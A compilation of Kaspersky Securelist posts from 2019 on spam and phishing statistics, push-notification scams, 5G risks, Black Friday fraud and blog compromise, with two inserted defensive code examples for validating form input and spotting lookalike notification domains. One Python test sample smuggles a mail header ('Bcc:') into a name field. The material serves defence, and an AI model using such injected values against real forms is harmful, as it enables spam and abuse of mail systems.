Scammers also used another fraudulent scheme: An email informed victims that their request to cancel Amazon Prime had been accepted, but if they had changed their mind, they should call the number in the message. Fearing their accounts may have been hacked, victims phoned the number — this was either premium-rate and expensive, or, worse, during the call the scammers tricked them into revealing confidential data.

Scammers collect photos of documents and selfies

This quarter we detected a surge in fraud related to stealing photos of documents and selfies with them (often required for registration or identification purposes). In phishing emails seemingly from payment systems and banks, users were asked under various pretexts to confirm their identity by going to a special page and uploading a selfie with an ID document. The fake sites looked quite believable, and provided a list of necessary documents with format requirements, links to privacy policy, user agreement, etc.

Some scammers even managed without a fake website. For instance, in summer Italian users were hit by a spam attack involving emails about a smartphone giveaway. To receive the prize, hopefuls had to send a photograph of an ID document and a selfie to the specified email address. To encourage victims to respond, the scammers stated that the offer would soon expire.

To obtain copies of documents, scammers also sent fake Facebook messages in which recipients were informed that access to their accounts had been restricted due to complaints about the content of some posts. To prevent their account from being deleted, they were instructed to send a photo or scan of a driving license and other ID documents with a selfie, plus medical insurance details.

YouTube and Instagram

Scammers continue to exploit traditional schemes on new platforms, and Q3 was a bumper quarter in this regard. For instance, YouTube ads appeared offering the viewer the chance to earn a lot of quick and easy money. The video explained to users that they had to take a survey and provide personal details, after which they would receive a payout or a gift from a large company, etc. To add credibility, fake reviews from supposedly “satisfied customers” were posted under the video. What’s more, the enthusiastic bot-generated comments did not appear all in one go, but were added gradually to look like a live stream.

All the user had to do was follow the link under the video and then follow the steps in the video instructions. Sure, to receive the handout, a small “commission fee” or payment to “confirm the account” was required.

Similar schemes did the rounds on Instagram. Advertising posts in the name of various celebrities (fake accounts are easily distinguished from real ones by the absence of a blue tick) were often used to lure fans with prize draws or rewards for completing a paid survey. As with the YouTube videos, there were plenty of fake glowing comments under such posts. Given that such giveaways by stars are not uncommon, inattentive users could swallow the bait.

Back to school

In Q3, we registered a series of attacks related in one way or another to education. Phishers harvested usernames and passwords from the personal accounts of students and lecturers using fake pages mimicking university login pages.

The scammers were looking not for financial data, but for university research papers, as well as any personal information that might be kept on the servers. Data of this kind is in high demand on the darknet market. Even data that seems useless at first can be used by cybercriminals to prepare a targeted attack.

One way to create phishing pages is to hack into legitimate resources and post fraudulent content on them. In Q3, phishers hacked school websites and created fake pages on them to mimic login forms for commonly used resources.

Scammers also tried to steal usernames and passwords for the mail servers of educational service providers. To do so, they mailed out phishing messages disguised as support service notifications asking recipients to confirm that the mail account belonged to them.

Apple product launch

In September, Apple unveiled its latest round of products, and as usual the launch was followed by fans and scammers alike — we detected phishing emails in mail traffic aimed at stealing Apple ID authentication data.

Scammers also harvested users’ personal data by sending spam messages offering free testing of new releases.

The number of attempts to open fake websites mentioning the Apple brand rose in the runup to the unveiling of the new product line and peaked on the actual day itself:

Number of attempts to open Apple-related phishing pages, September 2019

Attacks on pay TV users

To watch TV or record live broadcasts in the UK, a license fee is payable. This was exploited by spammers who sent out masses of fake license expiry/renewal messages. What’s more, they often used standard templates saying that the license could not be renewed because the bank had declined the payment.

The recipient was then asked to verify (or update) their personal and/or payment details by clicking on a link pointing to a fake data entry and payment form.

Spam through website feedback forms

The website of any large company generally has one or even several feedback forms. These can be used to ask questions, express wishes, sign up for company events, or subscribe to newsletters. But messages sent via such forms often come not only from clients or interested visitors, but from scammers too.

There is nothing new about this phenomenon per se, but it is interesting to observe how the mechanism for sending spam through forms has evolved. If previously spammers targeted company mailboxes linked to feedback forms, now fraudsters use them to send spam to people on the outside.

This is possible because some companies do not pay due attention to website security, allowing attackers to bypass simple CAPTCHA tests with the aid of scripts and to register users en masse using feedback forms. Another oversight is that the username field, for example, accepts any text or link. As a result, the victim whose mailing address was used receives a legitimate confirmation of registration email, but containing a message from the scammers. The company itself does not receive any message.
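The defensive counterpart to the abuse described above, as an added example (not from the Securelist report): validate the name field so it cannot carry a link or a mail-header break, never echo a rejected value into the confirmation mail, and throttle sign-ups per address. The sample submissions, domains and `example.invalid` addresses are constructed.

```python
"""Defensive handling of a sign-up / feedback form whose confirmation mail
echoes a user-supplied name back to the address entered in the form."""
import re
import unicodedata

MAX_NAME_LEN = 64
# Link-like content: explicit schemes, "www.", or "word dot tld" obfuscations.
_LINK_RE = re.compile(
    r"(?i)(?:https?://|www\.|"
    r"\b[a-z0-9-]+(?:\s*\(?\s*dot\s*\)?\s*|\.)(?:com|net|org|ru|info|xyz|top|site|shop)\b)")


def validate_display_name(name):
    """Return (ok, reason). Rejects names that could carry an advertisement or
    break the outbound message (CR/LF in a header field allows header injection)."""
    if not isinstance(name, str):
        return False, "not a string"
    n = unicodedata.normalize("NFKC", name).strip()
    if not n:
        return False, "empty"
    if len(n) > MAX_NAME_LEN:
        return False, "too long"
    if any(unicodedata.category(ch).startswith("C") for ch in n):
        return False, "control characters"
    if _LINK_RE.search(n):
        return False, "contains a link or domain"
    return True, ""


def render_confirmation(name, site="Example Shop"):
    """Build the confirmation body from a fixed template; a rejected name is
    never echoed, so the mail cannot become the spammer's delivery channel."""
    ok, _ = validate_display_name(name)
    greeting = f"Hello {name.strip()}," if ok else "Hello,"
    return (f"{greeting}\n\nThanks for signing up at {site}. "
            "Use the link in your account page to finish registration.")


class RegistrationThrottle:
    """Per-address sliding-window limit: scripted mass sign-ups aimed at one
    victim mailbox are cut off after `limit` attempts within `window` seconds."""

    def __init__(self, limit=3, window=3600):
        self.limit, self.window, self._seen = limit, window, {}

    def allow(self, email, now):
        key = email.strip().lower()
        recent = [t for t in self._seen.get(key, []) if now - t < self.window]
        if len(recent) >= self.limit:
            self._seen[key] = recent
            return False
        recent.append(now)
        self._seen[key] = recent
        return True


# Constructed sample submissions; the last three are in the style of form spam.
SAMPLES = [
    "Maria Silva",
    "J. R. Smith",
    "Earn $5000 a week -> http://promo.example.invalid",
    "Cheap meds at bestdeals dot shop",
    "Bob\r\nBcc: everyone@example.invalid",
]


def triage(samples=SAMPLES):
    """Map each submission to 'ok' or the rejection reason."""
    return {s: validate_display_name(s)[1] or "ok" for s in samples}


if __name__ == "__main__":
    for sample, verdict in triage().items():
        print(f"{verdict:28s} {sample!r}")
```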

Such spam started to surge several years ago, and has recently become even more popular — in Q3 services for delivering advertising messages through feedback forms began to be advertised in spam mailings.

Attacks on corporate email

Last quarter, we observed a major spam campaign in which scammers sent emails pretending to be voicemail notifications. To listen to the supposed message, the recipient was invited to click or tap the (phishing) link that pointed to a website mimicking the login page of a popular Microsoft service. It was a page for signing either into Outlook or directly into a Microsoft account.

The attack was aimed specifically at corporate mail users, since various business software products allow the exchange of voice messages and inform users of new ones via email.

It is worth noting that the number of spam attacks aimed specifically at the corporate sector has increased significantly of late. Cybercriminals are after access to employees’ email.

Another common trick is to report that incoming emails are stuck in the delivery queue. To receive these supposedly undeliverable messages, the victim is prompted to follow a link and enter their corporate account credentials on another fake login page, from where they go directly to the cybercriminals. Last quarter, our products blocked many large-scale spam campaigns under the guise of such notifications.

Statistics: spam

Proportion of spam in mail traffic

Share of spam in global mail traffic, Q2 and Q3 2019

In Q3 2019, the largest share of spam was recorded in August (57.78%). The average percentage of spam in global mail traffic was 56.26%, down 1.38 p.p. against the previous reporting period.

Sources of spam by country

Sources of spam by country, Q3 2019

The TOP 5 spam-source countries remain the same as last quarter, only their percentage shares are slightly different. China is in first place (20.43%), followed by the US (13.37%) and Russia (5.60%). Fourth position goes to Brazil (5.14%) and fifth to France (3.35%). Germany took sixth place (2.95%), followed — with a gap of less than 0.5 p.p. — by India (2.65%), Turkey (2.42%), Singapore (2.24%), and Vietnam (2.15%).

Spam email size

Spam email size, Q2 and Q3 2019

In Q3 2019, the share of very small emails (up to 2 KB) in spam decreased by 4.38 p.p. to 82.93%. The proportion of emails sized 5-10 KB grew slightly (by 1.52 p.p.) against the previous quarter to 3.79%.

Meanwhile, the share of 10-20 KB emails climbed by 0.26 p.p. to 2.24%. As for the number of 20-50 KB emails, their share changed more significantly, increasing by 2.64 p.p. (up to 4.74%) compared with the previous reporting period.

Malicious attachments in email

Number of Mail Anti-Virus triggerings, Q2 2019 – Q3 2019

In Q3 2019, our security solutions detected a total of 48,089,352 malicious email attachments, which is almost five million more than in Q2. July was the most active month with 17 million Mail Anti-Virus triggerings, while August was the “calmest” — with two million fewer.

TOP 10 malicious attachments in mail traffic, Q3 2019

In Q3, first place by prevalence in mail traffic went to the Office malware Exploit.MSOffice.CVE-2017-11882.gen (7.13%); in second place was the Worm.Win32.WBVB.vam worm (4.13%), and in third was another malware aimed at Microsoft Office users, Trojan.MSOffice.SAgent.gen (2.24%).

TOP 10 malware families, Q3 2019

As for malware families, the Backdoor.Win32.Androm family (7.49%) claimed first place.

In second place are Microsoft Office exploits from the Exploit.MSOffice.CVE-2017-11882.gen family (7.20%). And in third is Worm.Win32.WBVB.vam (4.60%).

Countries targeted by malicious mailings

Distribution of Mail Anti-Virus triggerings by country, Q3 2019

First place by number of Mail Anti-Virus triggerings in Q3 2019 was retained by Germany. Its score increased by 0.31 p.p. to 10.36%. Vietnam also remained in the TOP 3, rising to second position (5.92%), and Brazil came in third just a tiny fraction behind.

Statistics: phishing

In Q3 2019, the Anti-Phishing system prevented 105,220,094 attempts to direct users to scam websites. The percentage of unique attacked users was 11.28% of the total number of users of Kaspersky products worldwide.

Attack geography

The country with the largest share of users attacked by phishers in Q3 2019 was Venezuela (30.96%), which took second place in the previous quarter and has since added 5.29 p.p.

Geography of phishing attacks, Q3 2019

Having lost 3.53 p.p., Greece ranked second (22.67%). Third place, as in the last quarter, went to Brazil (19.70%).

Country     %*
Venezuela   30.96
Greece      22.67
Brazil      19.70
Honduras    17.58
Guatemala   16.80
Panama      16.70
Australia   16.18
Chile       15.98
Ecuador     15.64
Portugal    15.61

* Share of users on whose computers the Anti-Phishing system was triggered out of all Kaspersky users in the country

Organizations under attack

The rating of categories of organizations attacked by phishers is based on triggers of the Anti-Phishing component on user computers. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

For the first time this year, the share of attacks on organizations in the Global Internet Portals category (23.81%) exceeded the share of attacks on credit organizations (22.46%). Social networks (20.48%) took third place, adding 11.40 p.p. to their share.

Distribution of organizations subjected to phishing attacks by category, Q3 2019

In addition, the TOP 10 said goodbye to the Government and Taxes category.

Its place was taken by the Financial Services category, which unites companies providing financial services not covered by the Banks or Payment Systems categories: providers of insurance, leasing, brokerage and other services.


The average share of spam in global mail traffic (56.26%) this quarter decreased by 1.38 p.p. against the previous reporting period, while the number of attempted redirects to phishing pages compared to Q2 2019 fell by 25 million to just over 105 million.

Top in this quarter’s list of spam-source countries is China, with a share of 20.43%. Our security solutions blocked 48,089,352 malicious mail attachments, while Backdoor.Win32.Androm became the most common mail-based malware family — its share of mail traffic amounted to 7.49%.

Unwanted notifications in browser

25 November, 2019 - 11:46

When push notifications first appeared in browsers back in 2015, few people wondered how the tool would be used in the future. Once a useful technology made to keep regular readers informed about updates, today it is often used to bombard website visitors with unsolicited ads. To achieve that, users are tricked into subscribing to notifications, for example by passing subscription consent off as some other action. The victim ends up subscribed to ad deliveries, while at the same time quite unable to get rid of the annoying messages, being unaware of their source.

Examples of unsolicited push notifications

Other than ads, downright scam notifications may also be delivered, such as about lottery wins, or offers of money in exchange for completing a survey. All such proposals are usually phishing attacks seeking to coax users to part with their money. We have repeatedly anatomized such cases in our quarterly spam and phishing reports.

From January 1 through September 30, 2019, Kaspersky Lab products blocked attempts to sign users up for, and to display, ad and scam notifications on the devices of more than 14 million unique users all over the world. The highest share of users (out of all users of our products in the country) hit by unsolicited subscriptions was observed in Algeria (27.2%), Belarus (24.1%), Nepal (23.7%), Kazakhstan (23.6%) and the Philippines (22.2%).

We have also registered an upward trend in the spread of ad and scam subscriptions. Since the turn of the year, the number of users hit by this problem has continued to grow:

Number of users hit by unwanted subscriptions, January – September 2019

Getting the user subscribed

To make users sign up for notifications they don’t need, scammers try to pass the confirmation window off as something else. For example, as CAPTCHA:

In other instances, clicking “Allow” button is ostensibly needed to play back a video or begin downloading a file:

Sometimes the webpage content remains blocked until the user has agreed to sign up for notifications:

Often the victim agrees to receive promotional notifications having been misled to believe that he or she is subscribing to updates on a website of interest. In the case below, a subscription like that is offered by a website ostensibly dedicated to Android devices:

Of particular note are websites touting subscriptions on behalf of popular resources: these are in fact phishing copies of popular websites – of only slightly different appearance and with domain names that look like the real ones.

This page has nothing to do with the company’s official website, it just refers to it

Another imitation

Sometimes scammers simply modify the script so that the buttons swap places in the subscription request dialog box; a user accustomed to clicking “Block” on the right-hand side of the box is likely to hit “Allow” instead.

If you look up the earlier screenshots, you may notice that in this dialog box the buttons are placed the other way around

How do subscriptions work?

For the user to begin receiving notifications, his or her consent is required. Some requests for consent are illustrated above. These are activated using scripts that come with the webpage.

Examples of webpages featuring links to scripts activating subscription request dialog boxes (marked red)

The main purpose of these scripts is to detect whether the functions needed to display notifications are present, such as the ServiceWorker script, which runs as a background service and allows notifications to be pushed even when the browser is closed. The sign-up scripts used for ad and scam subscriptions are usually heavily obfuscated, but their key elements are nevertheless discernible.

Obfuscated functions of a sign-up script

A clearer portion of a sign-up script code with some obfuscation elements

If the user has consented to notifications, the script sends to the notification host server a unique user ID, which will later help to determine who exactly is to receive the news. After consent is secured, the server stores the user’s ID, while a link to the website which has signed the user up for notifications (the page on which the “Allow” button has been clicked) is saved in browser settings.

Websites authorized to deliver push notifications in browser settings. The box highlights ad subscriptions in which the content of notifications is unrelated to the original content of the website

So, the user has consented to notifications, the subscription server has stored the user’s ID, and the browser has memorized the webpage which had provided consent for subscription. Now the server can deliver a push message to the user by sending it via the subscription service in JSON format.

Example of notification message in JSON format

The message contains text, an image (if needed), a link to the destination website, and the user ID. The notification itself will feature a link to the website which had signed the user up, but not the webpage to which the user will be redirected. Very often this misleads the user, especially if the sign-up website uses a domain name made to look like the legitimate one.

Example of notification misleading the user with a link to a sign-up website
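The mismatch described above (a notification attributed to the sign-up site whose link opens somewhere else, often from a lookalike domain) can be checked mechanically. The following Node.js snippet is an added example, not code from the Securelist post: it models a push payload of the shape the article describes (title, body, image, destination link, user ID) and returns findings for a cross-domain link, for a sign-up or destination domain that imitates a domain on a watch list, and for wording that mimics a system or antivirus alert. All domains, the payload and the keyword list are constructed placeholders, and the lookalike test is a simple heuristic rather than a full confusable-character algorithm.

```javascript
// Added example (not from the Securelist post): assess a push-notification payload
// against the origin the user actually subscribed on. Every domain below is a
// constructed placeholder under the reserved .test TLD.

// Lower-case the host and drop a leading "www." so comparisons are stable.
// URL is a Node.js global, so no import is needed.
function hostOf(urlString) {
  return new URL(urlString).hostname.toLowerCase().replace(/^www\./, "");
}

// Registrable domain approximated as the last two labels. Good enough for the
// constructed inputs here; production code should consult the public suffix list.
function baseDomain(host) {
  return host.split(".").slice(-2).join(".");
}

// Collapse common look-alike substitutions (digit for letter, "rn" for "m",
// "vv" for "w", inserted hyphens) so "examp1e-android" can be compared with "example".
function skeleton(label) {
  return label
    .replace(/0/g, "o").replace(/1/g, "l").replace(/3/g, "e").replace(/5/g, "s")
    .replace(/rn/g, "m").replace(/vv/g, "w").replace(/[-_]/g, "");
}

// True when host is not the trusted domain but is built to look like it: the trusted
// name appears as a subdomain prefix (example.com.login.test), or the registrable
// label is a skeleton match or superstring of the trusted label. Short trusted labels
// raise false positives with the superstring check; tune the watch list accordingly.
function imitates(host, trustedDomain) {
  const base = baseDomain(host);
  if (base === trustedDomain) return false;
  if (host.includes(trustedDomain + ".")) return true;
  const label = skeleton(base.split(".")[0]);
  const trusted = skeleton(trustedDomain.split(".")[0]);
  return label === trusted || label.includes(trusted);
}

// Constructed phrase list typical of notifications disguised as OS or antivirus alerts.
const SYSTEM_ALERT_WORDS = /virus|infected|licen[cs]e|defender|update required|your (pc|computer)/i;

// Returns human-readable findings; an empty array means nothing suspicious was seen.
function assessNotification(subscribedOrigin, payload, trustedDomains) {
  const findings = [];
  const subHost = hostOf(subscribedOrigin);
  const linkHost = hostOf(payload.link);

  if (baseDomain(linkHost) !== baseDomain(subHost)) {
    findings.push(`cross-domain: shown for ${subHost} but the link opens ${linkHost}`);
  }
  for (const trusted of trustedDomains) {
    if (imitates(subHost, trusted)) findings.push(`sign-up site ${subHost} imitates ${trusted}`);
    if (imitates(linkHost, trusted)) findings.push(`destination ${linkHost} imitates ${trusted}`);
  }
  if (SYSTEM_ALERT_WORDS.test(`${payload.title || ""} ${payload.body || ""}`)) {
    findings.push("wording mimics a system or antivirus alert");
  }
  return findings;
}

// Constructed sample: the user clicked "Allow" on a site imitating example.com, and the
// payload delivers a fake infection alert leading to an unrelated landing page.
const SAMPLE_PAYLOAD = {
  title: "Your PC is infected!",
  body: "Click to remove 3 viruses now",
  image: "https://cdn.pushhost.test/alert.png",
  link: "https://cleaner-offers.test/landing",
  userId: "u-000123",
};

function main() {
  const findings = assessNotification("https://www.examp1e-android.test/", SAMPLE_PAYLOAD, ["example.com"]);
  for (const f of findings) console.log("finding:", f);
}
main();
```

The watch list is the set of brands whose imitation you care about; a notification that passes all three checks can still be unwanted, so the result is a triage aid for the subscriptions listed in browser settings, not a verdict.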

What’s the upshot

In the most harmless case, the victim will simply receive push ads. Interestingly, their content may vary depending on the user’s location. For example, if in Singapore, country-relevant content will be displayed:

By the way, the example above shows a “success story” advertisement, an ad category that has been quite popular in the last couple of years. Push notifications often deliver links to stories about how to get rich or soar to success, framed around sensitive social topics, for example “how to get rich in a particular country” or “how to become a successful manager if you are a woman”. Most such “tips” advertise success trainings and workshops or various mascots.

Worthy of separate mention are push messages disguised as system notifications from the OS or applications: the victim may be prompted to click a button to deactivate push ads or to extend an antivirus license.

Computer virus infection alerts are among the most unpleasant notifications. These usually redirect users to pre-designed pages made to look like the official Microsoft website or like some Windows OS components, e.g., Windows Defender:

This trick is often used to distribute various “PC cleaning” utilities. And while some of them do perform the stated functions to a greater or lesser extent, others simply try to milk the user out of as much money as they can – either for the “work” done or for upgrade to a better equipped version.

Avoiding unsolicited subscriptions

To avoid receiving annoying notifications or scam ads, follow a few simple recommendations:

  • Where possible, block all subscription offers, unless they come from popular and trusted websites. Even then keep your eyes open not to be taken in by a fake website.
  • If unable to avoid an unwanted subscription, you can still block it in the browser settings.
  • Use protective solutions made to warn about scam notifications and delete the existing ones, if needed.

Kaspersky Lab’s products detect push notification attempts and existing subscriptions with the verdicts not-a-virus:AdWare.Script.Pusher and Trojan.Multi.BroSubsc.gen.

5G security and privacy for smart cities

22 November, 2019 - 11:00

The 5G telecommunications revolution is imminent. It is the next generation of cellular network, making use of the existing 4G LTE in addition to opening up the millimeter wave band. 5G will be able to welcome more network-connected devices and increase speeds considerably for users. It will serve as the foundation for advanced services, including:

  • 8K streaming, real-time mobile gaming and augmented/virtual reality experiences;
  • Complex remote operations such as remote unmanned vehicles, delivery and surveillance drones, surgical robots;
  • Critical infrastructure operations: enhanced management and monitoring systems for traffic, energy and water facilities;
  • Emergency and healthcare interventions: services for saving lives greatly benefit from 5G installations; drones can quickly reach and live broadcast an incident location, could be used for delivering first aid and equipment or even to transport a victim to the closest medical center.

5G risks and challenges

Managing security is a continuous and dynamic process. With the dramatic increase in the number of connected devices comes a natural expansion of the attack surface and threat intensity. As 5G technologies become widely deployed, the weaknesses and inherent security flaws of 5G will be identified and hopefully quickly patched.

The key anticipated risks can be described as follows:

  • Protocol weaknesses and large-scale vulnerability exploitation
  • Severe DDoS attacks
  • BYOD threats
  • Data security and privacy
  • State-funded terrorism, anti-fossil fuel activism, espionage or corporate sabotage
  • Critical infrastructure/public safety

Public privacy, safety and critical infrastructure

Connected services and infrastructure are a double-edged sword: they provide better visibility, efficiency and performance, but they make non-critical infrastructure critical and therefore expose more of the population to unaffordable risks. The general public is being ‘lulled’ into welcoming the convenience and continuous visibility provided by 5G, though in the event of a disruption, public order could be at stake.

The conventional boundaries of critical infrastructure, such as water supply, the energy grid, military facilities and financial institutions, will expand much further into unprecedented areas in a 5G-connected world. All of these will require new standards of safety.

On the privacy side, matters become more complex. The advent of 5G with its short range will definitely mean more cell communication towers and building antennas being deployed in dense urban centers. With the right toolset, someone could collect and track the precise location of users. Another issue is that 5G service providers will have extensive access to large amounts of data being sent by user devices that could show exactly what is happening inside a user’s home and at the very least describe via metadata their living environment, in-house sensors and parameters.

Taking into account all of the above, it is our view that government and industry leaders need to combine their efforts to promote secure and safe 5G technology projects to enhance the services and quality of life for citizens of smart cities.

To learn more about 5G technologies, risks, challenges and security solutions, please read the full report.

Black Friday Alert 2019: Net Shopping Bag of Threats

22 November, 2019 - 10:04

Every year, Kaspersky releases an annual Black Friday alert to highlight how fraudsters may capitalize on increased levels of online shopping at this time of year when many brands are offering their customers appealing discounts. In the rush to get a big discount or, even more panic-inducing, a limited time offer, many shoppers lose all sense of vigilance. Caution goes out the window and consumers start tapping on links and email vouchers without their usual care and attention.

Spam and Phishing

Unfortunately, online shopping at this time of year needs more security-awareness, not less. It is the peak season for phishers and spammers. Along with many genuine offers, there also lurk phishing scams ready to reel in an unwitting bargain hunter’s bank details. By clicking on a too-good-to-be-true discount link online without checking it’s genuine, you could find yourself at a fake marketplace, that may look indistinguishable from the real website. On these sites, entering your bank details could result in money leaving your account, but no package arriving at your door.

Since Kaspersky began analyzing financial phishing activity in 2013, there has been a steady rise in threats, peaking at 54% in 2017. However, last year this trend slowed and reversed: the figure dropped to 44.70%. Financial phishing attacks are still expected to be a big risk around the upcoming Black Friday event, and we will be watching closely to see if the figure rises once more.

Share of financial phishing attacks from all phishing decreased for the first time in four years in 2018

Social Engineering in the Retail Sector

How do phishing scams work?

In order to make these scams a success, fraudsters need to lure their potential victims to fake webpages and obtain their bank details. To do this, attackers register website domains, often containing the magic phrase ‘Black Friday’ and keep their registration data hidden.

Their sites are usually well designed and appear to be genuine and of a high quality. Unlike many old typo-filled spam emails, phishing web pages are relatively easy to make look authentic – scammers can simply copy the source code from the real store’s website and make theirs appear to be a near perfect match.

Domain addresses are usually hidden until the event itself, so they are not blocked in advance by antivirus software vendors. The scam website is then activated immediately before the phishing mail goes out, just as shown in these screenshots.

Occasionally, these attacks appear to be sent by large banks or payment systems, allegedly partners of the Black Friday sales campaign, while in fact these are carefully crafted copies of legitimate pages and mailshots made by criminals. Emails or warnings may threaten to block the user’s account or promise some financial benefits by clicking on the email. These phishing emails make it seem like all you have to do is follow the link and log in to your account.

However, if you do log in to these sites with your credentials, all your bank account or payment card data — such as card numbers or usernames and passwords — will be leaked to the scammers.

Once they have this data, scammers could be able to withdraw money from your account, sell your bank card details on the dark web, or spend your money in various ways. This is often carried out by teams in other countries.

These scams come in a variety of forms. In one example, scammers offer goods at crazy discounts, encouraging the victim to share their bank card details, thereby risking losing all of their account funds and of course, not receiving their order. In another scheme, the victim might be tricked into transferring money to the attacker’s account, after which the fraudster breaks off all contact and the funds are lost.

There is also another widespread and very successful phishing scheme which asks users to complete a survey and fill in a large registration form, along with bank card details to take part in the promotion. After completing the form, you’re asked to send a link to the website to 10 friends via a messenger app.

Of course, victims of this scam won’t ever receive any prizes but instead end up bombarded with various links and emails for more useless surveys. Any additional clicks on these surveys usually mean that scammers receive even more money. Because the survey is shared through messenger apps, more users, who often trust links that come from their friends, might also fall for the trick. And so the cycle continues.

Where are phishing scams occurring?

According to our statistics, more than half of phishing attacks carried out in the digital retail space are in the payment sector – online stores, payment systems and banks. Frequently, criminals use brands of Amazon, eBay and Alibaba to trick users. Amazon was used as a disguise in more than a million attacks in the first three quarters of 2019 alone, as the graph below shows.

Online retailers most hit by phishing attacks during Q1-Q3 2019

Notably, the share of phishing incidents in the online retail space increases significantly during the peak sales period compared with the rest of the year. For instance, attacks using the eBay brand reached nearly 25,000 during the week of November 4th, 2018, two weeks before Black Friday, after a quiet period in the preceding days. The Amazon disguise was also a key choice for scammers, with more than 20,000 phishing attacks during the week of November 19th, 2018, the week of Black Friday last year.

Spikes in phishing attacks on online marketplaces from August – December 2018

These 2018 findings allow us to predict that in 2019 the situation may repeat.

Banking trojans

Similarly to phishing scams, Banking Trojans also target e-commerce brands so that they can track down user credentials – like banking login details, passwords, bank card numbers or phone numbers.

But with Trojans, the malware can intercept data fields on targeted websites. This means it can modify page content and steal the credentials entered, while the victim continues to believe they are entering their login and password into legitimate fields on the website. Because of this, cybercriminals can also monitor a compromised user’s online behavior, such as which sites they visit on the infected device.

Once the user browses to one of the targeted e-commerce websites, the Trojan activates its form-grabbing functionality and saves all the data a user inputs on the website. On an e-commerce website, this means a credit or debit card number, expiration date and CVV, as well as your site login credentials.

If the site or user’s bank doesn’t feature two-factor authentication, then the criminals behind the Trojan will have access to all this data and can use it to empty the user’s bank account or use their card details for purchases.

In the first three quarters of 2019, Kaspersky discovered 15 families of financial malware targeted at users of popular brands. In addition to the already known banking families such as Zeus, Betabot, Cridex and Gozi, this year, we have also seen two mobile banking Trojans joining our list: Anubis and Gustuff.

Last year’s report saw a 10% increase in the detection rate of financial malware between 2017 and 2018[1], but over the course of the full year that growth was a far more significant 24%. More than 15 million attacks by banking Trojans have been registered in the first three quarters of 2019. This means we have already seen a nine percent increase on what was found during 2018.

Overall number of attacks by Banking Trojans, 2015 – 2019

Mobile Trojans are also able to steal user credentials. The common scenario for user account theft on mobile devices is an overlay attack, in which the attacker’s program draws its own window on top of the app or window the user is viewing. Often the overlaid window or data input form is identical to the real one, and the user enters their data believing that they are dealing with the original program.

Targeted e-commerce categories

In 2019, we found those 15 malware families were targeting a total of 91 consumer e-commerce sites and mobile apps across the world.

Of those, consumer goods websites such as fashion and clothing, or toys and jewelry, were the most commonly targeted, with 28 websites falling into this category. Also popular with phishing scams are entertainment websites with 20 examples found and travel bookings with 15 in that category.

Surprisingly, sites which sell big ticket items, such as consumer electronics (two websites found) and telecoms (12 websites), which are popular purchases on Black Friday, are at the bottom of the list.

Proportion of e-commerce categories targeted by malware in Q1-Q3 2019

Category                                                                    Targeted brands
Consumer apparel (fashion, shoes, gifts, toys, jewelry, department store)   28
Entertainment (cinema, games etc.)                                          20
Travel (flights, taxi, hotels, etc.)                                        15
Online retail platform (eBay, Alibaba group etc.)                           14
Telecoms                                                                    12
Consumer electronics                                                         2

Proportion of e-commerce categories targeted by malware in 2019, by number of targeted brands

Advice and recommendations

As shown in this overview, Black Friday offers a golden opportunity for fraudsters and scammers to steal consumers’ cash. Sometimes a deal can seem too-good-to-be-true, but retailers still offer great discounts at this time of year, so it’s important to examine every deal closely. Shopping around for a bargain can still be enjoyable, it just needs extra vigilance to make sure you can tell the difference between the must-have offers and fake promotions. With incidents of phishing and banking Trojans on the rise, it’s important to stay safe from cyberthreats during the peak Black Friday shopping season.

To stay safe and keep your hard-earned money secure while shopping online, Kaspersky recommends taking the following security measures:

If you are a consumer:

  • Avoid shopping from websites that appear suspicious or flawed, no matter how great their Black Friday deals are
  • Don’t click on unfamiliar links you receive in emails or social media messages, even from people you know, unless you were expecting the message
  • Double check the email address of the sender. If it is not the official brand’s website domain, do not click on the link
  • Hover over the linked text in the email or message and see which URL it will actually open
  • Invest in a robust cybersecurity solution to protect all the devices you use to shop online
  • Think about how much money you wish to spend in an online payment transaction account at any one time
  • Reduce the amount of funds you have in your bank and online accounts. The greater the balance, the more can be lost to fraudsters
  • Restrict the number of attempted transactions on your bank card
  • Turn on and always use two-factor authentication (Verified by Visa, MasterCard Secure Code, etc.)

If you are an online brand or retailer:

  • Use a reputable payment service and keep your online trading and payment platform software up to date. Every new update may contain critical patches to make the system less vulnerable to cybercriminals
  • Use a tailored IT and cybersecurity solution to protect your business and customers
  • Pay attention to the personal information used by customers who buy from you. Use a fraud prevention solution that you can adjust to your company profile and the profile of your customers

All research used in this report is based on user data obtained with consent and processed using the Kaspersky Security Network (KSN). All referenced banking Trojan malware were detected and blocked by Kaspersky security solutions.

The cybercrime ecosystem: attacking blogs

21 November, 2019 - 11:00

Executive summary

The Cybercrime Ecosystem is a series of articles explaining how cybercriminals operate, what drives them, what techniques they use and how we, regular Internet users, are part of that ecosystem. The articles will also cover technical details and up-to-date research on the threat landscape to provide a more realistic understanding of why this is a problem and how we can prevent it.

This article describes current problems with cybercriminals infecting websites with malicious code. It is very common to see cybercriminals exploit vulnerabilities in blogging software such as WordPress and Joomla! to inject their malicious code. This is very effective, as many blogs are whitelisted, are not detected as suspicious websites by anti-virus software and get a lot of traffic. In my research, I decided to investigate this further and see what the current threat landscape looks like by researching the most visited blogs in Sweden.

In my research, I noticed that the majority of the blogs were running outdated versions of not just the WordPress core, but plugins, too. Their vulnerabilities would allow both authenticated and unauthenticated users to execute system commands, inject malicious code, such as JavaScript, and perform SQL injections to get access to the database. Please note that none of the vulnerabilities have been verified; they are simply based on the publicly available version number identified in the research.


Attacking websites and infecting them with malicious code is probably one of the most common types of attacks by cybercriminals. It will allow criminals to perform multiple attacks against visitors to the website. They can basically control all the visitors and redirect their browsers to any website they want, while the visitor may not be aware it is happening. The link to the infected website can be sent by email, in a personal message on a social media platform or any other common way.

By redirecting the visitors to a website under the criminals’ control, they can, for example, exploit vulnerabilities in the browser or other client software such as Java, Flash, Acrobat Reader, VLC, Microsoft Office and tons of others.

They can also redirect the user to scam/spam sites, for example, by tricking users into downloading a fake software update or scaring them to make them pay a ransom. Lately, we have also seen that criminals can utilize the browser itself for cryptocurrency mining, etc. or use it as a zombie in a larger botnet for denial-of-service attacks.

Cybercriminals can hack into blogs by using many different methods, such as exploiting software vulnerabilities or getting access to admin panels, getting remote access (SSH, telnet) with known or leaked passwords, or in some cases, even buying legitimate ads, poisoning these with malicious code, and displaying on the targeted website. This technique is called Malvertising.

